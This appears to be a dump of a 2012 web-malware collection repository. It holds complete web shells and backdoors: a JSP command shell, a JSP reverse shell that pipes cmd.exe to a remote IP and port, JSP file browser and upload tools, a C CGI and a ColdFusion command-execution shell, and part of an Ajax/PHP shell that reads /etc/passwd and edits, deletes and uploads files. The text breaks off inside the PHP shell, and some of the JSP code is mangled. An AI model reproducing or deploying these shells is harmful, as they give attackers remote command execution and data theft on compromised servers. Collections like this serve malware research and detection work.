private void setupProcess(HttpSession session) {
Thread processThreadSessionOld = (Thread) session.getAttribute("process");
if (processThreadSessionOld != null) {
processThreadSessionOld.interrupt();
}
ProcessThread processThreadSession = new ProcessThread();
processThreadSession.start();
session.setAttribute("process", processThreadSession);
while(processThreadSession.getProgIn()==null && processThreadSession.isAlive()){
}
session.setAttribute("progInBufferedWriter", processThreadSession.getProgIn());
session.setAttribute("progOutputByteArrayOutputStream", processThreadSession.getProgOutput());
session.setAttribute("progErrorByteArrayOutputStream", processThreadSession.getProgError());
}
private String getOutput(HttpSession session) {
ByteArrayOutputStream progOutput = (ByteArrayOutputStream) session.getAttribute("progOutputByteArrayOutputStream");
ByteArrayOutputStream progErrorOutput = (ByteArrayOutputStream) session.getAttribute("progErrorByteArrayOutputStream");
StringBuilder stringBuilder = new StringBuilder();
if (progOutput != null) {
synchronized (progOutput) {
stringBuilder.append(progOutput.toString());
progOutput.reset();
}
}
if (progErrorOutput != null) {
synchronized (progErrorOutput) {
stringBuilder.append(progErrorOutput.toString());
progErrorOutput.reset();
}
}
return stringBuilder.toString();
}
private void execute(HttpSession session, String cmd) throws IOException {
BufferedWriter progIn = (BufferedWriter) session.getAttribute("progInBufferedWriter");
if (progIn != null) {
progIn.write(cmd + "\n");
progIn.flush();
}
}
%><%
String ServeName = request.getRequestURI();
String IsAuth = (String) session.getAttribute("isauth");
if ("true".equals(IsAuth)) {
String function = request.getParameter("function");
if (function != null) {
if ("exit".equalsIgnoreCase(function)) {
session.invalidate();
return;
}
if ("execute".equalsIgnoreCase(function)) {
String cmd = request.getParameter("cmd");
if (cmd != null && !cmd.isEmpty()) {
execute(session, cmd);
}
} else if ("update".equalsIgnoreCase(function)) {
out.write(getOutput(session));
} else if ("controlc".equalsIgnoreCase(function)) {
setupProcess(session);
}
return;
}
}
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>JSP Shell</title>
<script type="text/javascript" language="javascript">
function sendRequest(url,callbackOk,callbackKo,postData) {
var req = createXMLHTTPObject();
if (!req) return;
var method = (postData) ? "POST" : "GET";
req.open(method,url,true);
req.setRequestHeader('User-Agent','XMLHTTP/1.0');
if (postData){
req.setRequestHeader('Content-type','application/x-www-form-urlencoded');
req.setRequestHeader("Content-length", postData.length);
req.setRequestHeader("Connection", "close");
}
req.onreadystatechange = function () {
if (req.readyState != 4) return;
if ((req.status != 200) && (req.status != 304)) {
// alert('HTTP error ' + req.status);
if(callbackKo){
callbackKo(req);
}
return;
}
callbackOk(req);
}
if (req.readyState == 4) return;
req.send(postData);
}
var XMLHttpFactories = [
function () {return new XMLHttpRequest()},
function () {return new ActiveXObject("Msxml2.XMLHTTP")},
function () {return new ActiveXObject("Msxml3.XMLHTTP")},
function () {return new ActiveXObject("Microsoft.XMLHTTP")}
];
function createXMLHTTPObject() {
var xmlhttp = false;
for (var i=0;i<XMLHttpFactories.length;i++) {
try {
xmlhttp = XMLHttpFactories[i]();
}
catch (e) {
continue;
}
break;
}
return xmlhttp;
}
function exeCommand(myFunction){
sendRequest('<%=ServeName%>' ,
function(request){
if(!document.shell.autoUpdate.checked){
setTimeout("updateText();",1000);
}
document.shell.cmd.value = "";
},
function(request){
alert("Error");
},
"function="+myFunction+"&cmd="+document.shell.cmd.value);
return false;
}
function updateText(){
sendRequest('<%=ServeName%>' ,
function(request){
document.shell.output.value = document.shell.output.value + request.responseText;
document.shell.output.scrollTop = document.shell.output.scrollHeight;
if(document.shell.autoUpdate.checked){
setTimeout("updateText();",500);
}
},
function(request){
alert("Error on update");
document.shell.autoUpdate.checked = false;
},
"function=update");
}
</script>
</head>
<body>
<h1>JSP Shell</h1>
<%
if (session.isNew()) {
%>
<FORM action="<%=ServeName%>" method="POST">
<fieldset>
<legend>Authentication</legend>
<p>Password:
<input type="password" name="pass" size="32" />
<input name="submit_btn" type="submit" value="ok" />
</p>
</fieldset>
</FORM>
</BODY>
</HTML>
<%
return;
} else {
if ((IsAuth == null && request.getParameter("pass") != null)) {
String pass = request.getParameter("pass");
MessageDigest mdAlgorithm = MessageDigest.getInstance("MD5");
mdAlgorithm.update(pass.getBytes());
byte[] digest = mdAlgorithm.digest();
StringBuffer hexString = new StringBuffer();
for (int i = 0; i < digest.length; i++) {
pass = Integer.toHexString(0xFF & digest[i]);
if (pass.length() < 2) {
pass = "0" + pass;
}
hexString.append(pass);
}
if (!(hexString.toString().equalsIgnoreCase("95f292773550fc8d39aaa8ddc9f3cfac"))) {
%>
MUKHA MO!!!
<%
session.invalidate();
return;
} else {
session.setAttribute("isauth", "true");
//Start proc
setupProcess(session);
}
} else if ("true".equals(IsAuth)) {
} else {
session.invalidate();
return;
}
}
%>
<FORM NAME="shell" action="" method="POST" onsubmit="exeCommand('execute');return false;">
<fieldset>
<legend>Shell</legend>
<p>
<textarea name="output" cols="120" rows="25" readonly="readonly"
onfocus="this.oldValue=document.shell.autoUpdate.checked; document.shell.autoUpdate.checked = false;"
onblur="document.shell.autoUpdate.checked= this.oldValue; updateText();" ></textarea>
</p>
<p><input type="text" name="cmd" size="100"/><input type="submit" value="Enter" name="Enter" />
<input type="button" value="Reset" name="controlcButton" onclick="exeCommand('controlc');return false;"/>
<input type="button" value="Clean" name="cleanButton" onclick="document.shell.output.value='';return false;"/>
<input type="checkbox" name="autoUpdate" value="AutoUpdate" onchange="if(this.checked){updateText();}" checked="true">Auto Update</input>
</p>
</fieldset>
</FORM>
<FORM name="exitForm" action="<%=ServeName%>" method="POST">
<p><input type="hidden" name="function" value="exit" /><input type="submit" value="Exit" name="exit" /></p>
</FORM>
<script>
updateText();
</script>
</BODY>

87
web-malware-collection-13-06-2012/JSP/jspbd.jsp Normal file
View file

@ -0,0 +1,87 @@
// backdoor.jsp
< %@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
< %!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
% >
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
< %
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
% >

77
web-malware-collection-13-06-2012/JSP/list.jsp Normal file
View file

@ -0,0 +1,77 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>

162
web-malware-collection-13-06-2012/JSP/up.jsp Normal file
View file

@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "/tmp/";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>

162
web-malware-collection-13-06-2012/JSP/up_win32.jsp Normal file
View file

@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "c:\\";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>

74
web-malware-collection-13-06-2012/Other/cmd.c Normal file
View file

@ -0,0 +1,74 @@
//
// cmdcgi.exe 0.1 darkraver (12/05/2005)
//
#include <stdio.h>
char *uri_decode(char *uri) {
int i=0;
int ptr=0;
char *command;
char hexa[3];
char code;
command=(char *)malloc(strlen(uri));
for(i=0;i<strlen(uri);i++) {
switch(*(uri+i)) {
case '+':
*(command+ptr)=' ';
ptr++;
break;
case '%':
sprintf(hexa, "%c%c\x00", *(uri+i+1), *(uri+i+2));
i+=2;
//printf("HEXA: %s\n", hexa);
sscanf(hexa, "%x", &code);
//printf("CODE: %c\n", code);
*(command+ptr)=code;
ptr++;
break;
default:
*(command+ptr)=*(uri+i);
ptr++;
break;
}
}
*(command+ptr)='\0';
return command;
}
int main(int argc, char **argv) {
char *cmd;
printf("Content-type: text/html\n\n");
printf("<html><body>\n");
cmd=(char *)getenv("QUERY_STRING");
if(!cmd || strlen(cmd)==0) {
printf("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
printf("<input type=\"text\" name=\"cmd\">");
printf("<input type=\"submit\" value=\"Send\">");
printf("<br><br><hr></form>");
} else {
//printf("QUERY_STRING: %s\n", cmd);
cmd+=4;
cmd=uri_decode(cmd);
printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
fflush(stdout);
execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
}
}

32
web-malware-collection-13-06-2012/Other/cmd.cfm Normal file
View file

@ -0,0 +1,32 @@
<html>
<body>
<cfoutput>
<table>
<form method="POST" action="">
<tr>
<td>Command:</td>
<td> < input type=text name="cmd" size=50<cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td>
</tr>
<tr>
<td>Options:</td>
<td> < input type=text name="opts" size=50 <cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
</tr>
<tr>
<td>Timeout:</td>
<td>< input type=text name="timeout" size=4 <cfif isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5" </cfif> > </td>
</tr>
</table>
<input type=submit value="Exec" >
</FORM>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>

3
web-malware-collection-13-06-2012/PHP/150.php Normal file
View file

File diff suppressed because one or more lines are too long

2905
web-malware-collection-13-06-2012/PHP/27.9.txt Normal file
View file

File diff suppressed because it is too large Load diff

1410
web-malware-collection-13-06-2012/PHP/2mv2.txt Normal file
View file

File diff suppressed because it is too large Load diff

1487
web-malware-collection-13-06-2012/PHP/404.php Normal file
View file

File diff suppressed because it is too large Load diff

1417
web-malware-collection-13-06-2012/PHP/404.txt Normal file
View file

File diff suppressed because it is too large Load diff

646
web-malware-collection-13-06-2012/PHP/Ajax_PHP Command Shell.txt Normal file
View file

@ -0,0 +1,646 @@
<?php
session_start();
error_reporting(0);
$password = "password"; //Change this to your password ;)
$version = "0.7B";
$functions = array('Clear Screen' => 'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"
);
$thisfile = basename(__FILE__);
$style = '<style type="text/css">
.cmdthing {
border-top-width: 0px;
font-weight: bold;
border-left-width: 0px;
font-size: 10px;
border-left-color: #000000;
background: #000000;
border-bottom-width: 0px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #008000;
font-family: verdana;
border-right-width: 0px;
border-right-color: #000000;
}
input,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #FFFFFF;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #FFFFFF;
font-family: verdana;
border-right-width: 1px;
border-right-color: #FFFFFF;
}
A:hover {
text-decoration: none;
}
table,td,div {
border-collapse: collapse;
border: 1px solid #FFFFFF;
}
body {
color: #FFFFFF;
font-family: verdana;
}
</style>';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}
}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
}
}
if(isset($_GET['runcmd']))
{
$cmd = $_GET['runcmd'];
print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
if($cmd == "")
{
print "Empty Command..type \"shellhelp\" for some ehh...help";
}
elseif($cmd == "upload")
{
print '<br>Uploading to: '.realpath(".");
if(is_writable(realpath(".")))
{
print "<br><b>I can write to this directory</b>";
}
else
{
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
}
}
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
{
if(file_exists($file[1]) && is_dir($file[1]))
{
chdir($file[1]);
$_SESSION['workdir'] = $file[1];
print "Current directory changed to ".$file[1];
}
else
{
print "Directory not found";
}
}
elseif(strtolower($cmd) == "shellhelp")
{
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
&copy; By Ironfist
The shell can be used by anyone to command any server, the main purpose was
to create a shell that feels as dynamic as possible, is expandable and easy
to understand.
If one of the command execution functions work, the shell will function fine.
Try the "canirun" command to check this.
Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
not used to these commands, google a little.
<b>Custom Functions</b>
If you want to add your own custom command in the Quick Commands list, check
out the code. The $function array contains \'func name\' => \'javascript function\'.
Take a look at the built-in functions for examples.
I know this readme isn\'t providing too much information, but hell, does this shell
even require one :P
- Iron
';
}
elseif(ereg("editfile (.*)",$cmd,$file))
{
if(file_exists($file[1]) && !is_dir($file[1]))
{
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
$contents = file($file[1]);
foreach($contents as $line)
{
print htmlspecialchars($line);
}
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
else
{
print "File not found.";
}
}
elseif(ereg("deletefile (.*)",$cmd,$file))
{
if(is_dir($file[1]))
{
if(rmdir($file[1]))
{
print "Directory succesfully deleted.";
}
else
{
print "Couldn't delete directory!";
}
}
else
{
if(unlink($file[1]))
{
print "File succesfully deleted.";
}
else
{
print "Couldn't delete file!";
}
}
}
elseif(strtolower($cmd) == "canirun")
{
print "If any of these functions is Enabled, the shell will function like it should.<br>";
if(function_exists(passthru))
{
print "Passthru: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Passthru: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(exec))
{
print "Exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Exec: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(system))
{
print "System: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "System: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(shell_exec))
{
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
}
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
if( ini_get('safe_mode') ){
print "Safe Mode: <b><font color=red>Enabled</b></font>";
}
else
{
print "Safe Mode: <b><font color=green>Disabled</b></font>";
}
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
if( ini_get('open_basedir') ){
print "Open_basedir: <b><font color=red>Enabled</b></font>";
}
else
{
print "Open_basedir: <b><font color=green>Disabled</b></font>";
}
}
//About the shell
elseif(ereg("listdir (.*)",$cmd,$directory))
{
if(!file_exists($directory[1]))
{
die("Directory not found");
}
//Some variables
chdir($directory[1]);
$i = 0; $f = 0;
$dirs = "";
$filez = "";
if(!ereg("/$",$directory[1])) //Does it end with a slash?
{
$directory[1] .= "/"; //If not, add one
}
print "Listing directory: ".$directory[1]."<br>";
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
if ($handle = opendir($directory[1])) {
while (false !== ($file = readdir($handle))) {
if(is_dir($file))
{
$dirs[$i] = $file;
$i++;
}
else
{
$filez[$f] = $file;
$f++;
}
}
print "<td>";
foreach($dirs as $directory)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
}
print "</td><td>";
foreach($filez as $file)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
}
print "</td></table>";
}
}
elseif(strtolower($cmd) == "about")
{
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
}
//Show info
elseif(strtolower($cmd) == "showinfo")
{
if(function_exists(disk_free_space))
{
$free = disk_free_space("/") / 1000000;
}
else
{
$free = "N/A";
}
if(function_exists(disk_total_space))
{
$total = trim(disk_total_space("/") / 1000000);
}
else
{
$total = "N/A";
}
$path = realpath (".");
print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
if(function_exists(passthru))
{
passthru("uname -a");
}
else
{
print "Passthru is disabled :(";
}
}
//Read /etc/passwd
elseif(strtolower($cmd) == "etcpasswdfile")
{
$pw = file('/etc/passwd/');
foreach($pw as $line)
{
print $line;
}
}
//Execute any other command
else
{
if(function_exists(passthru))
{
passthru($cmd);
}
else
{
if(function_exists(exec))
{
exec("ls -la",$result);
foreach($result as $output)
{
print $output."<br>";
}
}
else
{
if(function_exists(system))
{
system($cmd);
}
else
{
if(function_exists(shell_exec))
{
print shell_exec($cmd);
}
else
{
print "Sorry, none of the command functions works.";
}
}
}
}
}
}
elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
{
$file = $_POST['filetosave'];
if(!is_writable($file))
{
if(!chmod($file, 0777))
{
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
}
}
$fh = fopen($file, 'w');
$dt = $_POST['filecontent'];
fwrite($fh, $dt);
fclose($fh);
}
else
{
?>
<html>
<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
<head>
<?php print $style; ?>
<SCRIPT TYPE="text/javascript">
function sf(){document.cmdform.command.focus();}
var outputcmd = "";
var cmdhistory = "";
function ClearScreen()
{
outputcmd = "";
document.getElementById('output').innerHTML = outputcmd;
}
function ClearHistory()
{
cmdhistory = "";
document.getElementById('history').innerHTML = cmdhistory;
}
function deletefile(file)
{
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
if(deleteit)
{
runcommand('deletefile ' + file,'GET');
}
}
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot create XMLHTTP instance');
return false;
}
http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}
function SaveFile()
{
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
"&filecontent=" + encodeURI( document.getElementById("area1").value );
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
}
function runcommand(urltoopen,action,contenttosend){
cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
document.getElementById('history').innerHTML = cmdhistory;
if(urltoopen == "clear")
{
ClearScreen();
}
var ajaxRequest;
try{
ajaxRequest = new XMLHttpRequest();
} catch (e){
try{
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try{
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e){
alert("Wicked error, nothing we can do about it...");
return false;
}
}
}
ajaxRequest.onreadystatechange = function(){
if(ajaxRequest.readyState == 4){
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
document.getElementById('output').innerHTML = outputcmd;
var objDiv = document.getElementById("output");
objDiv.scrollTop = objDiv.scrollHeight;
}
}
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
if(action == "GET")
{
ajaxRequest.send(null);
}
document.cmdform.command.value='';
return false;
}
function set_tab_html(newhtml)
{
document.getElementById('commandtab').innerHTML = newhtml;
}
function set_tab(newtab)
{
if(newtab == "cmd")
{
newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
}
else if(newtab == "upload")
{
runcommand('upload','GET');
